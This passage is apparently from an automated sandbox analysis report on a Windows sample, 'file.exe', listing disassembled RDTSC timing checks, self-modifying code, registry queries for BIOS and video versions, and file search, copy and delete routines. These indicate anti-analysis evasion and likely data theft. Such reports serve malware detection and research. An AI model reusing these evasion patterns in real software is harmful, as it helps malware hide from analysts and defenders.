              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E15C second address: 73E178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F63C8D82F46h 0x0000000a jo 00007F63C8D82F4Ch 0x00000010 jnp 00007F63C8D82F46h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E178 second address: 73E17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E17E second address: 73E183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E183 second address: 73E1A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F63C8B57C28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E1A1 second address: 73E1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817A4B second address: 817A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F234 second address: 81F241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007F63C8D82F46h 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F39F second address: 81F3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F4FD second address: 81F507 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F63C8D82F46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F507 second address: 81F51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F63C8B57C1Dh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F51A second address: 81F525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F63C8D82F46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F7B3 second address: 81F7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F63C8B57C16h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007F63C8B57C16h 0x00000012 jnc 00007F63C8B57C16h 0x00000018 jp 00007F63C8B57C16h 0x0000001e jne 00007F63C8B57C16h 0x00000024 popad 0x00000025 popad 0x00000026 pushad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F916 second address: 81F92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F63C8D82F46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F92F second address: 81F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F934 second address: 81F957 instructions: 0x00000000 rdtsc 0x00000002 je 00007F63C8D82F5Dh 0x00000008 jmp 00007F63C8D82F57h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823C50 second address: 823C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F63C8B57C26h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823C78 second address: 823C96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F50h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F63C8D82F46h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823C96 second address: 823CA9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F63C8B57C16h 0x00000008 jnl 00007F63C8B57C16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E7EC second address: 82E7FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E7FB second address: 82E803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364E2 second address: 8364EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364EC second address: 8364F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364F2 second address: 8364FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8364FC second address: 836506 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836506 second address: 83650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83650A second address: 83650E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834F30 second address: 834F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F63C8D82F50h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F63C8D82F46h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834F50 second address: 834F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842F29 second address: 842F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F50h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842F3D second address: 842F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842F51 second address: 842F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844826 second address: 84482B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84482B second address: 844833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847E72 second address: 847E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847A7C second address: 847A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8494DA second address: 8494EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F63C8B57C1Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B989 second address: 84B9B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F63C8D82F61h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F63C8D82F59h 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F63C8D82F46h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F4B7 second address: 85F4BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F751 second address: 85F759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FBB7 second address: 85FBCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F63C8B57C1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FFC6 second address: 85FFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FFCA second address: 85FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F63C8B57C16h 0x00000013 jng 00007F63C8B57C16h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FFEB second address: 860001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864137 second address: 86413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86413E second address: 864144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8643C5 second address: 8643C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8643C9 second address: 8643CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8643CD second address: 8643D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8643D3 second address: 864451 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F63C8D82F4Ah 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnc 00007F63C8D82F4Ch 0x00000013 jnc 00007F63C8D82F48h 0x00000019 popad 0x0000001a nop 0x0000001b adc dx, F72Dh 0x00000020 call 00007F63C8D82F52h 0x00000025 adc dh, 00000052h 0x00000028 pop edx 0x00000029 push 00000004h 0x0000002b add dword ptr [ebp+122D3725h], edi 0x00000031 call 00007F63C8D82F49h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F63C8D82F59h 0x0000003e jmp 00007F63C8D82F4Dh 0x00000043 popad 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864451 second address: 864471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8B57C1Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F63C8B57C18h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864750 second address: 864755 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 865929 second address: 86592D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86592D second address: 86593B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86593B second address: 86593F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867435 second address: 86743A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC020D second address: 4EC021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC021C second address: 4EC0248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F63C8D82F4Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0248 second address: 4EC024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC024E second address: 4EC0252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0252 second address: 4EC0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0260 second address: 4EC0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0264 second address: 4EC0281 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 728EAC0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F63C8B57C1Fh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0319 second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC031F second address: 4EC0336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, 4DC1ECA2h 0x00000011 mov ebx, 5C7630EEh 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0336 second address: 4EC03A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov cl, 96h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007F63C8D82F59h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push ecx 0x00000016 call 00007F63C8D82F53h 0x0000001b pop ecx 0x0000001c pop ebx 0x0000001d pushfd 0x0000001e jmp 00007F63C8D82F56h 0x00000023 sbb si, 35F8h 0x00000028 jmp 00007F63C8D82F4Bh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC03A5 second address: 4EC03A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC03A9 second address: 4EC03C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783689 second address: 78368D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78368D second address: 783693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DF830 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DF914 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A08D9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7FC83B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-27268
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-26086
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003A18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A3910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A1269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A1250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003A4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003A23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0039DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpC